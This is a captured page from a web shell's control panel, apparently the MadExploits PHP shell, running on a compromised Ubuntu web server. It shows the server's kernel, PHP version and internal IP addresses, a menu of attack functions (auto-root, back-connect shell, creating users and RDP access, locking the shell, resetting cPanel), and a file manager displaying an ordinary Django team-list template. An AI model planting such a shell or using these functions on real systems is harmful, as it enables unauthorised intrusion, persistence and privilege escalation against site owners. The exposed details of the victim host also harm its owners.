Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vicas-dev /
team /
templates /
team /
[ HOME SHELL ]
Name
Size
Permission
Action
add_member.html
1.63
KB
-rw-r--r--
team_list.html
993
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : team_list.html
{% extends "base.html" %} {% block content %} <h1 class="text-3xl font-bold mb-4"> {% if degree == "phd" %}PhD Students{% elif degree == "mtech" %}MTech Students{% elif degree == "btech" %}BTech Students{% else %}Alumni{% endif %} </h1> <div class="grid grid-cols-1 md:grid-cols-2 lg:grid-cols-4 gap-5"> {% for member in members %} <div class="p-4 border border-gray-300 rounded shadow"> {% if member.profile_photo %} <img src="{{ member.profile_photo.url }}" class="w-24 h-24 rounded-full mx-auto mb-2" /> {% endif %} <h2 class="text-xl font-bold text-center">{{ member.name }}</h2> <p class="text-sm text-gray-600 text-center">{{ member.year }}</p> <p class="text-center">{{ member.bio }}</p> {% if member.current_affiliation %} <p class="text-xs text-gray-500 text-center"> Current: {{ member.current_affiliation }} </p> {% endif %} </div> {% empty %} <p>No members found.</p> {% endfor %} </div> {% endblock %}
Close